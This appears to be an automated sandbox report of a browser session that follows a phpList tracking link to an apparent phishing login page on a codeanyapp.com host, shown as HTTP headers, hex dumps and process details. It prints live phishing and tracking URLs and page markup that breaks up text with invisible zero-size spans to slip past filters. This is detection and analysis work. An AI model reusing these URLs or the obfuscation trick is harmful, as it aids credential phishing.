                                                                                                    2025-01-02 08:50:01 UTC4344INData Raw: 7b 0a 09 09 09 09 72 62 75 67 67 79 51 53 41 2e 70 75 73 68 28 20 22 2e 23 2e 2b 5b 2b 7e 5d 22 20 29 3b 0a 09 09 09 7d 0a 0a 09 09 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 46 69 72 65 66 6f 78 20 3c 3d 33 2e 36 20 2d 20 35 20 6f 6e 6c 79 0a 09 09 09 2f 2f 20 4f 6c 64 20 46 69 72 65 66 6f 78 20 64 6f 65 73 6e 27 74 20 74 68 72 6f 77 20 6f 6e 20 61 20 62 61 64 6c 79 2d 65 73 63 61 70 65 64 20 69 64 65 6e 74 69 66 69 65 72 2e 0a 09 09 09 65 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 20 22 5c 5c 5c 66 22 20 29 3b 0a 09 09 09 72 62 75 67 67 79 51 53 41 2e 70 75 73 68 28 20 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 20 29 3b 0a 09 09 7d 20 29 3b 0a 0a 09 09 61 73 73 65 72 74 28 20 66 75 6e 63 74 69 6f 6e 28 20 65 6c 20 29 20 7b 0a 09 09 09 65 6c 2e 69
                                                                                                    Data Ascii: {rbuggyQSA.push( ".#.+[+~]" );}// Support: Firefox <=3.6 - 5 only// Old Firefox doesn't throw on a badly-escaped identifier.el.querySelectorAll( "\\\f" );rbuggyQSA.push( "[\\r\\n\\f]" );} );assert( function( el ) {el.i
                                                                                                    2025-01-02 08:50:01 UTC11584INData Raw: 31 37 20 2d 20 31 38 2b 0a 09 09 2f 2f 20 49 45 2f 45 64 67 65 20 73 6f 6d 65 74 69 6d 65 73 20 74 68 72 6f 77 20 61 20 22 50 65 72 6d 69 73 73 69 6f 6e 20 64 65 6e 69 65 64 22 20 65 72 72 6f 72 20 77 68 65 6e 20 73 74 72 69 63 74 2d 63 6f 6d 70 61 72 69 6e 67 0a 09 09 2f 2f 20 74 77 6f 20 64 6f 63 75 6d 65 6e 74 73 3b 20 73 68 61 6c 6c 6f 77 20 63 6f 6d 70 61 72 69 73 6f 6e 73 20 77 6f 72 6b 2e 0a 09 09 2f 2f 20 65 73 6c 69 6e 74 2d 64 69 73 61 62 6c 65 2d 6e 65 78 74 2d 6c 69 6e 65 20 65 71 65 71 65 71 0a 09 09 63 6f 6d 70 61 72 65 20 3d 20 28 20 61 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 20 7c 7c 20 61 20 29 20 3d 3d 20 28 20 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 20 7c 7c 20 62 20 29 20 3f 0a 09 09 09 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d
                                                                                                    Data Ascii: 17 - 18+// IE/Edge sometimes throw a "Permission denied" error when strict-comparing// two documents; shallow comparisons work.// eslint-disable-next-line eqeqeqcompare = ( a.ownerDocument || a ) == ( b.ownerDocument || b ) ?a.compareDocum
                                                                                                    2025-01-02 08:50:01 UTC4800INData Raw: 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 0a 09 09 09 09 09 09 75 73 65 43 61 63 68 65 20 3d 20 21 78 6d 6c 20 26 26 20 21 6f 66 54 79 70 65 2c 0a 09 09 09 09 09 09 64 69 66 66 20 3d 20 66 61 6c 73 65 3b 0a 0a 09 09 09 09 09 69 66 20 28 20 70 61 72 65 6e 74 20 29 20 7b 0a 0a 09 09 09 09 09 09 2f 2f 20 3a 28 66 69 72 73 74 7c 6c 61 73 74 7c 6f 6e 6c 79 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 0a 09 09 09 09 09 09 69 66 20 28 20 73 69 6d 70 6c 65 20 29 20 7b 0a 09 09 09 09 09 09 09 77 68 69 6c 65 20 28 20 64 69 72 20 29 20 7b 0a 09 09 09 09 09 09 09 09 6e 6f 64 65 20 3d 20 65 6c 65 6d 3b 0a 09 09 09 09 09 09 09 09 77 68 69 6c 65 20 28 20 28 20 6e 6f 64 65 20 3d 20 6e 6f 64 65 5b 20 64 69 72 20 5d 20 29 20 29 20 7b 0a 09 09
                                                                                                    Data Ascii: odeName.toLowerCase(),useCache = !xml && !ofType,diff = false;if ( parent ) {// :(first|last|only)-(child|of-type)if ( simple ) {while ( dir ) {node = elem;while ( ( node = node[ dir ] ) ) {
                                                                                                    2025-01-02 08:50:01 UTC16384INData Raw: 63 6f 6d 62 69 6e 61 74 6f 72 73 0a 09 09 09 76 61 72 20 69 6e 70 75 74 20 3d 20 5b 5d 2c 0a 09 09 09 09 72 65 73 75 6c 74 73 20 3d 20 5b 5d 2c 0a 09 09 09 09 6d 61 74 63 68 65 72 20 3d 20 63 6f 6d 70 69 6c 65 28 20 73 65 6c 65 63 74 6f 72 2e 72 65 70 6c 61 63 65 28 20 72 74 72 69 6d 2c 20 22 24 31 22 20 29 20 29 3b 0a 0a 09 09 09 72 65 74 75 72 6e 20 6d 61 74 63 68 65 72 5b 20 65 78 70 61 6e 64 6f 20 5d 20 3f 0a 09 09 09 09 6d 61 72 6b 46 75 6e 63 74 69 6f 6e 28 20 66 75 6e 63 74 69 6f 6e 28 20 73 65 65 64 2c 20 6d 61 74 63 68 65 73 2c 20 5f 63 6f 6e 74 65 78 74 2c 20 78 6d 6c 20 29 20 7b 0a 09 09 09 09 09 76 61 72 20 65 6c 65 6d 2c 0a 09 09 09 09 09 09 75 6e 6d 61 74 63 68 65 64 20 3d 20 6d 61 74 63 68 65 72 28 20 73 65 65 64 2c 20 6e 75 6c 6c 2c 20 78
                                                                                                    Data Ascii: combinatorsvar input = [],results = [],matcher = compile( selector.replace( rtrim, "$1" ) );return matcher[ expando ] ?markFunction( function( seed, matches, _context, xml ) {var elem,unmatched = matcher( seed, null, x
                                                                                                    2025-01-02 08:50:01 UTC16384INData Raw: 74 65 78 74 20 3d 3d 20 64 6f 63 75 6d 65 6e 74 20 7c 7c 20 63 6f 6e 74 65 78 74 20 7c 7c 20 6f 75 74 65 72 6d 6f 73 74 3b 0a 09 09 09 7d 0a 0a 09 09 09 2f 2f 20 41 64 64 20 65 6c 65 6d 65 6e 74 73 20 70 61 73 73 69 6e 67 20 65 6c 65 6d 65 6e 74 4d 61 74 63 68 65 72 73 20 64 69 72 65 63 74 6c 79 20 74 6f 20 72 65 73 75 6c 74 73 0a 09 09 09 2f 2f 20 53 75 70 70 6f 72 74 3a 20 49 45 3c 39 2c 20 53 61 66 61 72 69 0a 09 09 09 2f 2f 20 54 6f 6c 65 72 61 74 65 20 4e 6f 64 65 4c 69 73 74 20 70 72 6f 70 65 72 74 69 65 73 20 28 49 45 3a 20 22 6c 65 6e 67 74 68 22 3b 20 53 61 66 61 72 69 3a 20 3c 6e 75 6d 62 65 72 3e 29 20 6d 61 74 63 68 69 6e 67 20 65 6c 65 6d 65 6e 74 73 20 62 79 20 69 64 0a 09 09 09 66 6f 72 20 28 20 3b 20 69 20 21 3d 3d 20 6c 65 6e 20 26 26 20
                                                                                                    Data Ascii: text == document || context || outermost;}// Add elements passing elementMatchers directly to results// Support: IE<9, Safari// Tolerate NodeList properties (IE: "length"; Safari: <number>) matching elements by idfor ( ; i !== len &&


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.449760198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:50:00 UTC648OUTGET /favicon.ico HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                    Sec-Fetch-Dest: image
                                                                                                    Referer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.php
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:50:01 UTC167INHTTP/1.1 404 Not Found
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:23 GMT
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    Content-Length: 310
                                                                                                    Connection: close
                                                                                                    2025-01-02 08:50:01 UTC310INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 34 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 73 70 6f 74 79 2d 6f 6d 73 61 76 65 30 35
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /favicon.ico was not found on this server.</p><hr><address>Apache/2.4.34 (Ubuntu) Server at spoty-omsave05


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    16192.168.2.449768198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:50:08 UTC786OUTGET /army/army/auth/login.php HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-User: ?1
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    Referer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.php
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:50:09 UTC185INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-01-02 08:50:09 UTC1251INData Raw: 34 64 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 72 65 73 2f 61 70 70 2e 63 73 73 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a
                                                                                                    Data Ascii: 4dc<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"> <title>Welcome</title> <link rel="stylesheet" href="res/app.css"></head>
                                                                                                    2025-01-02 08:50:09 UTC8715INData Raw: 32 32 30 33 0d 0a 74 61 6e 74 3b 20 77 69 64 74 68 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 68 65 69 67 68 74 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 22 3e 37 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 77 69 64 74 68 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 68 65 69 67 68 74 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 22 3e 61 3c 2f 73 70 61 6e 3e 6f 3c 73 70 61 6e
                                                                                                    Data Ascii: 2203tant; width:0 !important; height:0 !important; font-size:0 !important;">7</span><span style="padding:0 !important; margin:0 !important; display:inline-block !important; width:0 !important; height:0 !important; font-size:0 !important;">a</span>o<span
                                                                                                    2025-01-02 08:50:09 UTC2215INData Raw: 38 61 30 0d 0a 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 77 69 64 74 68 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 68 65 69 67 68 74 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 22 3e 63 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 77 69 64
                                                                                                    Data Ascii: 8a0 style="padding:0 !important; margin:0 !important; display:inline-block !important; width:0 !important; height:0 !important; font-size:0 !important;">c</span><span style="padding:0 !important; margin:0 !important; display:inline-block !important; wid
                                                                                                    2025-01-02 08:50:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    17192.168.2.449772198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:50:17 UTC786OUTGET /army/army/auth/login.php HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-User: ?1
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    Referer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.php
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:50:18 UTC185INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:53:40 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-01-02 08:50:18 UTC9959INData Raw: 32 36 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 72 65 73 2f 61 70 70 2e 63 73 73 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d
                                                                                                    Data Ascii: 26df<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"> <title>Welcome</title> <link rel="stylesheet" href="res/app.css"></head>
                                                                                                    2025-01-02 08:50:18 UTC2215INData Raw: 38 61 30 0d 0a 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 77 69 64 74 68 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 68 65 69 67 68 74 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 22 3e 32 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 77 69 64
                                                                                                    Data Ascii: 8a0 style="padding:0 !important; margin:0 !important; display:inline-block !important; width:0 !important; height:0 !important; font-size:0 !important;">2</span><span style="padding:0 !important; margin:0 !important; display:inline-block !important; wid
                                                                                                    2025-01-02 08:50:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.449915198.199.109.954432800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-02 08:51:05 UTC786OUTGET /army/army/auth/login.php HTTP/1.1
                                                                                                    Host: spoty-omsave0558101.codeanyapp.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                    Sec-Fetch-User: ?1
                                                                                                    Sec-Fetch-Dest: document
                                                                                                    Referer: https://spoty-omsave0558101.codeanyapp.com/army/army/auth/login.php
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-02 08:51:06 UTC185INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Thu, 02 Jan 2025 07:54:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    2025-01-02 08:51:06 UTC9959INData Raw: 32 36 64 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 72 65 73 2f 61 70 70 2e 63 73 73 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d
                                                                                                    Data Ascii: 26df<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"> <title>Welcome</title> <link rel="stylesheet" href="res/app.css"></head>
                                                                                                    2025-01-02 08:51:06 UTC2215INData Raw: 38 61 30 0d 0a 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 77 69 64 74 68 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 68 65 69 67 68 74 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 22 3e 33 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 6d 61 72 67 69 6e 3a 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 20 21 69 6d 70 6f 72 74 61 6e 74 3b 20 77 69 64
                                                                                                    Data Ascii: 8a0 style="padding:0 !important; margin:0 !important; display:inline-block !important; width:0 !important; height:0 !important; font-size:0 !important;">3</span><span style="padding:0 !important; margin:0 !important; display:inline-block !important; wid
                                                                                                    2025-01-02 08:51:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:03:49:43
                                                                                                    Start date:02/01/2025
                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                    Imagebase:0x7ff76e190000
                                                                                                    File size:3'242'272 bytes
                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:2
                                                                                                    Start time:03:49:46
                                                                                                    Start date:02/01/2025
                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2020,i,13172820280483757675,6438960111630721238,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                    Imagebase:0x7ff76e190000
                                                                                                    File size:3'242'272 bytes
                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:3
                                                                                                    Start time:03:49:52
                                                                                                    Start date:02/01/2025
                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sdazraf.hosted.phplist.com/lists/lt.php?tid=LkQEAA1XAgcGUE4JBFUIGlcAUFAaAwVaVxsIVFpTUgYHD1RQBlwaVAEFUwYKAFQaVVUMABpVUglQGwhSUwYZCl5ZAw4NU1IBVQYATFEGAFJaBQwHGgdSXAYbBVhSABkKAloCGw0GUgEEBgAGVwMADg"
                                                                                                    Imagebase:0x7ff76e190000
                                                                                                    File size:3'242'272 bytes
                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    No disassembly